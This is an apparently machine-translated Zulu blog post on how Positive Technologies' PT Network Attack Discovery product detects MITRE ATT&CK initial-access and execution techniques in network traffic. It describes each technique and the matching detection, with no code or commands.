Ake sithi usunayo kakade i-SIEM esebenzayo eqoqa izingodo futhi ihlaziye imicimbi, futhi isofthiwe yokulwa namagciwane ifakiwe ezindaweni zokugcina. Noma kunjalo,
Kunezinhlobo ezimbili zama-NTA: ezinye zisebenza ne-NetFlow, ezinye zihlaziya ithrafikhi eluhlaza. Inzuzo yezinhlelo zesibili ukuthi zingakwazi ukugcina amarekhodi ethrafikhi eluhlaza. Ngenxa yalokhu, uchwepheshe wezokuphepha kolwazi angaqinisekisa impumelelo yokuhlasela, enze usongo lube ngokwendawo, aqonde ukuthi ukuhlasela kwenzeke kanjani nokuthi ungakuvimbela kanjani okufanayo esikhathini esizayo.
Sizobonisa ukuthi usebenzisa i-NTA ungasebenzisa kanjani ubufakazi obuqondile noma obungaqondile ukuze uhlonze wonke amaqhinga okuhlasela awaziwayo achazwe kusisekelo solwazi.
Mayelana nesisekelo solwazi se-ATT&CK
I-MITER ATT&CK iyisisekelo solwazi olusesidlangalaleni esithuthukiswe futhi sinakekelwa yi-MITER Corporation ngokusekelwe ekuhlaziyweni kwama-APT omhlaba wangempela. Kuyisethi ehlelekile yamaqhinga namasu asetshenziswa abahlaseli. Lokhu kuvumela ochwepheshe bezokuphepha bolwazi abavela kuwo wonke umhlaba ukuthi bakhulume ulimi olufanayo. I-database ikhula njalo futhi yenezelwa ngolwazi olusha.
Isizindalwazi sikhomba amaqhinga ayi-12, ahlukaniswa ngezigaba zokuhlasela ku-inthanethi:
- ukufinyelela kokuqala;
- ukubulawa;
- ukuhlanganisa (ukuphikelela);
- ukukhuphuka kwamalungelo;
- ukuvimbela ukutholwa (ukugwema ukuzivikela);
- ukuthola imininingwane (ukufinyelela kokuqinisekisa);
- ukuhlola;
- ukunyakaza ngaphakathi kwe-perimeter (ukunyakaza kwe-lateral);
- ukuqoqwa kwedatha (ukuqoqwa);
- umyalo nokulawula;
- ukukhishwa kwedatha;
- umthelela.
Kuqhinga ngalinye, isisekelo solwazi se-ATT&CK sibonisa uhlu lwamasu asiza abahlaseli ukufeza umgomo wabo esigabeni samanje sokuhlasela. Njengoba inqubo efanayo ingasetshenziswa ezigabeni ezahlukene, ingabhekisela kumaqhinga amaningana.
Incazelo yesu ngalinye lihlanganisa:
- isihlonzi;
- uhlu lwamaqhinga esetshenziswa kuwo;
- izibonelo zokusetshenziswa kwamaqembu e-APT;
- izinyathelo zokunciphisa umonakalo ekusetshenzisweni kwayo;
- izincomo zokuthola.
Ochwepheshe bezokuphepha bolwazi bangasebenzisa ulwazi olusuka kusizindalwazi ukuze bahlele ulwazi mayelana nezindlela zamanje zokuhlasela futhi, becabangela lokhu, bakhe uhlelo lokuvikela olusebenzayo. Ukuqonda ukuthi amaqembu e-APT yangempela asebenza kanjani nakho kungaba umthombo wemibono yokusesha ngokuqhubekayo izinsongo ngaphakathi.
Mayelana ne-PT Network Attack Discovery
Sizohlonza ukusetshenziswa kwamasu asuka ku-ATT&CK matrix sisebenzisa uhlelo
Isistimu ithola ukuhlaselwa kusetshenziswa amasu e-ATT&CK isebenzisa imithetho yokuthola edalwe yithimba
Lapha ukumepha okugcwele kwe-PT NAD kuya ku-MITER ATT&CK matrix. Isithombe sikhulu, ngakho siphakamisa ukuthi usibuke efasiteleni elihlukile.
Ukufinyelela kokuqala
Amaqhinga okufinyelela okuqala ahlanganisa amasu okungena kunethiwekhi yenkampani. Umgomo wabahlaseli kulesi sigaba ukuletha ikhodi enonya kusistimu ehlaselwe nokuqinisekisa ukuthi kungenzeka iphinde ibulawe.
Ukuhlaziywa kwethrafikhi okuvela ku-PT NAD kuveza amasu ayisikhombisa okuthola ukufinyelela kokuqala:
1. T1189 : ukushayela-ngokuvumelana
Isu lapho isisulu sivula iwebhusayithi esetshenziswa abahlaseli ukuze baxhaphaze isiphequluli sewebhu futhi bathole amathokheni okufinyelela kuhlelo lokusebenza.
Yenzani i-PT NAD?: Uma ithrafikhi yewebhu ingabetheliwe, i-PT NAD ihlola okuqukethwe kwezimpendulo zeseva ye-HTTP. Lezi zimpendulo ziqukethe izenzo ezivumela abahlaseli ukuthi basebenzise ikhodi engafanele ngaphakathi kwesiphequluli. I-PT NAD ithola ngokuzenzakalelayo ukuxhashazwa okunjalo isebenzisa imithetho yokuthola.
Ukwengeza, i-PT NAD ithola usongo esinyathelweni sangaphambilini. Imithetho nezinkomba zokufaka ebucayini ziculwa uma umsebenzisi evakashele isayithi elimqondise kabusha kusayithi elinenqwaba yokuxhaphaza.
2. T1190 : sebenzisa uhlelo olubhekene nomphakathi
Ukuxhashazwa kobungozi kumasevisi afinyeleleka ku-inthanethi.
Yenzani i-PT NAD?: Yenza ukuhlola okujulile kokuqukethwe kwamaphakethe enethiwekhi, ihlonza izimpawu zomsebenzi ongaqondakali. Ikakhulukazi, kunemithetho ekuvumela ukuthi uthole ukuhlaselwa kwezinhlelo ezinkulu zokuphatha okuqukethwe (i-CMS), izixhumanisi zewebhu zemishini yenethiwekhi, nokuhlaselwa kwemeyili kanye namaseva e-FTP.
3. T1133 : amasevisi angaphandle akude
Abahlaseli basebenzisa izinsiza zokufinyelela kude ukuze baxhume kuzinsiza zenethiwekhi yangaphakathi kusuka ngaphandle.
Yenzani i-PT NAD?: njengoba isistimu ibona amaphrothokholi hhayi ngezinombolo zembobo, kodwa ngokuqukethwe kwamaphakethe, abasebenzisi besistimu bangakwazi ukuhlunga ithrafikhi ukuze bathole zonke izikhathi zezivumelwano zokufinyelela kude futhi bahlole ukufaneleka kwazo.
4. T1193 : okunamathiselwe kwi-spearphishing
Sikhuluma ngokuthunyelwa okunedumela elibi lokunamathiselwe kwi-imeyili kobugebengu bokweba imininingwane ebucayi.
Yenzani i-PT NAD?: Ikhipha amafayela ngokuzenzakalelayo kuthrafikhi futhi iwahlole ngokumelene nezinkomba zokonakaliswa. Amafayela asebenzisekayo kokunamathiselwe kwi-imeyili atholwa ngemithetho ehlaziya okuqukethwe kwethrafikhi yemeyili. Esimeni sebhizinisi, ukutshalwa kwezimali okunjalo kuthathwa njengokuxakayo.
5. T1192 : isixhumanisi sokudubula ngomkhonto
Ukusebenzisa izixhumanisi zobugebengu bokweba imininingwane ebucayi. Le nqubo ibandakanya abahlaseli abathumela i-imeyili yobugebengu bokweba imininingwane ebucayi enesixhumanisi okuthi, uma ichofozwa, ilande uhlelo olunonya. Njengomthetho, isixhumanisi sihambisana nombhalo ohlanganiswe ngokuhambisana nayo yonke imithetho yobunjiniyela bezenhlalakahle.
Yenzani i-PT NAD?: Ithola izixhumanisi zobugebengu bokweba imininingwane ebucayi kusetshenziswa izinkomba zokuyekethisa. Isibonelo, kusixhumi esibonakalayo se-PT NAD sibona iseshini lapho bekunoxhumo lwe-HTTP ngesixhumanisi esifakwe ohlwini lwamakheli obugebengu bokweba imininingwane ebucayi (phishing-url).
Ukuxhumana ngesixhumanisi esivela kuhlu lwezinkomba zobugebengu bokweba imininingwane ebucayi
6. T1199 : ubuhlobo obuthembekile
Ukufinyelela kunethiwekhi yesisulu ngokusebenzisa abantu besithathu isisulu esisungule nabo ubudlelwano obuthembekile. Abahlaseli bangagebenga inhlangano eyethenjwayo futhi baxhume kunethiwekhi eqondiwe ngayo. Ukwenza lokhu, basebenzisa ukuxhumana kwe-VPN noma ama-domain trusts, angabonakala ngokuhlaziywa kwethrafikhi.
Yenzani i-PT NAD?: icubungula izivumelwano zohlelo lokusebenza bese ilondoloza izinkambu ezihlukanisiwe kusizindalwazi, ukuze umhlaziyi wokuphepha wolwazi akwazi ukusebenzisa izihlungi ukuze athole konke ukuxhumeka kwe-VPN okusolisayo noma ukuxhumeka kwesizinda esiphambanayo kusizindalwazi.
7. T1078 : ama-akhawunti avumelekile
Ukusebenzisa izifakazelo ezijwayelekile, zasendaweni noma zesizinda ukuze kugunyazwe izinsiza zangaphandle nezangaphakathi.
Yenzani i-PT NAD?: Ibuyisela ngokuzenzakalelayo imininingwane evela ku-HTTP, FTP, SMTP, POP3, IMAP, SMB, DCE/RPC, SOCKS5, LDAP, Kerberos protocol. Ngokuvamile, lokhu ukungena ngemvume, iphasiwedi kanye nesibonakaliso sokuqinisekisa okuphumelelayo. Uma esetshenzisiwe, aboniswa ekhadini leseshini elihambisanayo.
Ukubulawa
Amasu okubulala ahlanganisa amasu abahlaseli abawasebenzisayo ukuze bakhiphe ikhodi kumasistimu onakalisiwe. Ukusebenzisa ikhodi enonya kusiza abahlaseli bathole ubukhona (iqhinga lokuphikelela) futhi banwebe ukufinyelela kumasistimu akude kunethiwekhi ngokuhamba ngaphakathi komjikelezo.
I-PT NAD ikuvumela ukuthi uthole ukusetshenziswa kwamasu ayi-14 asetshenziswa abahlaseli ukwenza ikhodi enonya.
1. T1191 : I-CMSTP (Isifaki Sephrofayela Somphathi Wokuxhunywa kwe-Microsoft)
Iqhinga lapho abahlaseli belungiselela khona ifayela le-INF elikhethekile lokufaka okunonya lensiza eyakhelwe ngaphakathi yeWindows CMSTP.exe (Isifaki Sephrofayela Yesiphathi Soxhumano). I-CMSTP.exe ithatha ifayela njengepharamitha bese ifaka iphrofayela yesevisi yoxhumo olukude. Njengomphumela, i-CMSTP.exe ingasetshenziselwa ukulayisha nokusebenzisa amalabhulali ezixhumanisi ezinamandla (*.dll) noma ama-scriptlets (*.sct) asuka eziphakelini ezikude.
Yenzani i-PT NAD?: Ithola ngokuzenzakalelayo ukudluliswa kwezinhlobo ezikhethekile zamafayela e-INF kuthrafikhi ye-HTTP. Ngaphezu kwalokhu, ithola ukudluliswa kwe-HTTP kwama-scriptlets anonya namalabhulali esixhumanisi ashukumisayo asuka kuseva ekude.
2. T1059 : isikhombimsebenzisi somugqa womyalo
Ukusebenzisana nesixhumi esibonakalayo somugqa womyalo. Isixhumi esibonakalayo somugqa womyalo singasetshenzwa ngaso endaweni noma kude, isibonelo kusetshenziswa izinsiza zokufinyelela kude.
Yenzani i-PT NAD?: ithola ngokuzenzakalelayo ukuba khona kwamagobolondo asekelwe ezimpendulweni zemiyalo yokuqalisa izinsiza ezihlukahlukene zomugqa womyalo, njenge-ping, ifconfig.
3. T1175 : imodeli yento yengxenye kanye ne-COM esabalalisiwe
Ukusetshenziswa kobuchwepheshe be-COM noma be-DCOM ukwenza ikhodi kumasistimu asendaweni noma akude ngenkathi uhamba kunethiwekhi.
Yenzani i-PT NAD?: Ithola amakholi e-DCOM asolisayo abahlaseli abavame ukuwasebenzisela ukuqalisa izinhlelo.
4. T1203 : ukuxhashazwa ekubulaweni kweklayenti
Ukuxhashazwa kobungozi ukwenza ikhodi engafanele endaweni yokusebenza. Izenzo eziwusizo kakhulu zabahlaseli yilezo ezivumela ikhodi ukuthi isetshenziswe kusistimu ekude, njengoba ingavumela abahlaseli ukuthi bathole ukufinyelela kuleyo sistimu. Indlela yokusebenza ingasetshenziswa kusetshenziswa izindlela ezilandelayo: ukuthunyelwa kweposi okunonya, iwebhusayithi enokuxhashazwa kwesiphequluli, nokuxhashazwa okukude kobungozi bohlelo.
Yenzani i-PT NAD?: Lapho ihlaziya ithrafikhi yemeyili, i-PT NAD iyayihlola ukuze ibone ukuthi akhona amafayela asebenzisekayo kokunamathiselwe. Ikhipha ngokuzenzakalelayo amadokhumenti ehhovisi kuma-imeyili angase aqukathe ukuxhaphaza. Imizamo yokusebenzisa ubungozi ibonakala kuthrafikhi, i-PT NAD iyithola ngokuzenzakalelayo.
5. T1170 : mshwa
Sebenzisa insiza ye-mshta.exe, esebenzisa izinhlelo zokusebenza ze-Microsoft HTML (HTA) ngesandiso se-.hta. Ngenxa yokuthi i-mshta icubungula amafayela ngokweqa izilungiselelo zokuphepha zesiphequluli, abahlaseli bangasebenzisa i-mshta.exe ukuze basebenzise amafayela anonya e-HTA, JavaScript, noma e-VBScript.
Yenzani i-PT NAD?: Amafayela e-hta okusetshenziswa nge-mshta nawo athunyelwa ngenethiwekhi - lokhu kungabonakala kuthrafikhi. I-PT NAD ithola ukudluliswa kwamafayela anonya anjalo ngokuzenzakalelayo. Ithwebula amafayela, futhi ulwazi mayelana nawo lungabukwa ekhadini leseshini.
6. T1086 : I-PowerShell
Ukusebenzisa i-PowerShell ukuthola ulwazi nokusebenzisa ikhodi enonya.
Yenzani i-PT NAD?: Uma i-PowerShell isetshenziswa abahlaseli berimothi, i-PT NAD ithola lokhu isebenzisa imithetho. Ithola amagama angukhiye olimi lwe-PowerShell asetshenziswa kakhulu emibhalweni eyingozi kanye nokudluliswa kwemibhalo ye-PowerShell ngephrothokholi ye-SMB.
7.
Ukusebenzisa i-Windows Task Scheduler nezinye izinsiza ukuze usebenzise ngokuzenzakalelayo izinhlelo noma imibhalo ngezikhathi ezithile.
Yenzani i-PT NAD?: abahlaseli badala imisebenzi enjalo, ngokuvamile bekude, okusho ukuthi izikhathi ezinjalo ziyabonakala kuthrafikhi. I-PT NAD ithola ngokuzenzakalelayo ukwakhiwa komsebenzi osolisayo kanye nemisebenzi yokuguqula isebenzisa i-ATSVC ne-ITaskSchedulerService RPC interface.
8. T1064 : umbhalo
Ukwenziwa kweskripthi ukuze wenze ngokuzenzakalelayo izenzo ezihlukahlukene zabahlaseli.
Yenzani i-PT NAD?: ithola ukudluliswa kwemibhalo ngenethiwekhi, okungukuthi, nangaphambi kokuba iqaliswe. Ithola okuqukethwe kombhalo kuthrafikhi eluhlaza futhi ithola ukudluliswa kwenethiwekhi kwamafayela anezandiso ezihambisana nezilimi zokubhala ezidumile.
9. T1035 : ukwenziwa kwesevisi
Qalisa ifayela elisebenzisekayo, imiyalelo yesixhumi esibonakalayo somugqa womyalo, noma iskripthi ngokusebenzisana namasevisi e-Windows, njengeSiphathi Sokulawula Isevisi (SCM).
Yenzani i-PT NAD?: ihlola ithrafikhi ye-SMB futhi ithola ukufinyelela ku-SCM ngemithetho yokudala, ukushintsha nokuqalisa isevisi.
Isu lokuqalisa isevisi lingasetshenziswa kusetshenziswa insiza yokukhipha umyalo okude we-PSExec. I-PT NAD ihlaziya iphrothokholi ye-SMB futhi ithola ukusetshenziswa kwe-PSExec lapho isebenzisa ifayela le-PSEXESVC.exe noma igama elijwayelekile lesevisi ye-PSEXECSVC ukuze isebenzise ikhodi kumshini oqhelile. Umsebenzisi udinga ukuhlola uhlu lwemiyalo ekhishiwe kanye nokuba semthethweni kokukhishwa komyalo wesilawuli kude kumsingathi.
Ikhadi lokuhlasela ku-PT NAD libonisa idatha kumaqhinga namasu asetshenziswa ngokuya nge-ATT&CK matrix ukuze umsebenzisi aqonde ukuthi isiphi isigaba sokuhlasela abahlaseli bakusiphi, yimiphi imigomo abaphishekelayo, nokuthi yiziphi izinyathelo zokunxephezela okufanele azithathe.
Umthetho mayelana nokusebenzisa insiza ye-PSExec iyaqalwa, engabonisa umzamo wokukhipha imiyalo emshinini oqhelile.
10. T1072 : isofthiwe yomuntu wesithathu
Indlela lapho abahlaseli bethola khona ukufinyelela kusofthiwe yokulawula yesilawuli kude noma isistimu yokuphakelwa kwesofthiwe yebhizinisi futhi bayisebenzisele ukusebenzisa ikhodi enonya. Izibonelo zesoftware enjalo: SCCM, VNC, TeamViewer, HBSS, Altiris.
Ngendlela, le nqubo ibaluleke kakhulu maqondana noguquko olukhulu oluya emsebenzini oqhelile futhi, ngenxa yalokho, ukuxhumana kwemishini eminingi yasekhaya engavikelekile ngokusebenzisa iziteshi ezingabazekayo zokufinyelela kude.
Yenzani i-PT NAD?: ithola ngokuzenzakalelayo ukusebenza kwesofthiwe enjalo kunethiwekhi. Isibonelo, imithetho ibangelwa ukuxhumana ngephrothokholi ye-VNC kanye nomsebenzi we-EvilVNC Trojan, efaka ngokuyimfihlo iseva ye-VNC kumsingathi wesisulu futhi iqalise ngokuzenzakalelayo. Futhi, i-PT NAD ithola ngokuzenzakalelayo iphrothokholi yeTeamViewer, lokhu kusiza umhlaziyi, esebenzisa isihlungi, ukuthola zonke izikhathi ezinjalo futhi ahlole ukufaneleka kwazo.
11. T1204 : ukubulawa komsebenzisi
Indlela lapho umsebenzisi asebenzisa khona amafayela angaholela ekusebenzeni kwekhodi. Lokhu kungaba, isibonelo, uma evula ifayela elisebenzisekayo noma esebenzisa idokhumenti yehhovisi nge-macro.
Yenzani i-PT NAD?: ibona amafayela anjalo esigabeni sokudlulisa, ngaphambi kokuthi ethulwe. Ulwazi ngabo lungafundwa ekhadini lezikhathi ezidluliselwe kuzo.
12. T1047 :I-Windows Management Instrumentation
Ukusetshenziswa kwethuluzi le-WMI, elinikeza ukufinyelela kwasendaweni nokukude ezingxenyeni zesistimu ye-Windows. Ngokusebenzisa i-WMI, abahlaseli bangakwazi ukusebenzisana nezinhlelo zendawo nezikude futhi benze imisebenzi eyahlukahlukene, njengokuqoqa ulwazi ngezinjongo zokuthola ulwazi kanye nokwethula izinqubo bekude ngenkathi uhamba eceleni.
Yenzani i-PT NAD?: Njengoba ukusebenzisana namasistimu akude nge-WMI kubonakala kuthrafikhi, i-PT NAD ithola ngokuzenzakalelayo izicelo zenethiwekhi zokusungula amaseshini e-WMI futhi ihlola ithrafikhi yemibhalo esebenzisa i-WMI.
13. T1028 : Ukuphathwa kwesilawuli kude seWindows
Ukusebenzisa isevisi ye-Windows kanye nephrothokholi evumela umsebenzisi ukuthi ahlanganyele namasistimu akude.
Yenzani i-PT NAD?: Ibona ukuxhumana kwenethiwekhi okusungulwe kusetshenziswa i-Windows Remote Management. Izikhathi ezinjalo zitholwa ngokuzenzakalelayo ngemithetho.
14. T1220 : I-XSL (Ulimi Lweshidi Lesitayela Esinwebekayo) lucutshungulwa
Ulimi lokumaka lwesitayela se-XSL lusetshenziswa ukuchaza ukucutshungulwa nokuboniswa kwedatha kumafayela e-XML. Ukuze kusekelwe imisebenzi eyinkimbinkimbi, izinga le-XSL lihlanganisa ukusekelwa kwemibhalo eshumekiwe ngezilimi ezihlukahlukene. Lezi zilimi zivumela ukusetshenziswa kwekhodi engafanele, okuholela ekudluleni kwezinqubomgomo zokuphepha ezisekelwe kuhlu olumhlophe.
Yenzani i-PT NAD?: ithola ukudluliswa kwamafayela anjalo ngenethiwekhi, okungukuthi, nangaphambi kokuba athulwe. Ithola ngokuzenzakalelayo amafayela e-XSL athunyelwa ngenethiwekhi namafayela anomaka we-XSL ngendlela exakile.
Kokubalulekile okulandelayo, sizobheka ukuthi uhlelo lwe-PT Network Attack Discovery NTA luwathola kanjani amanye amaqhinga omhlaseli namasu ngokuhambisana ne-MITER ATT&CK. Hlala ubukele!
Ababhali:
- U-Anton Kutepov, uchwepheshe we-PT Expert Security Center, Positive Technologies
- U-Natalia Kazankova, umdayisi wemikhiqizo e-Positive Technologies
Source: www.habr.com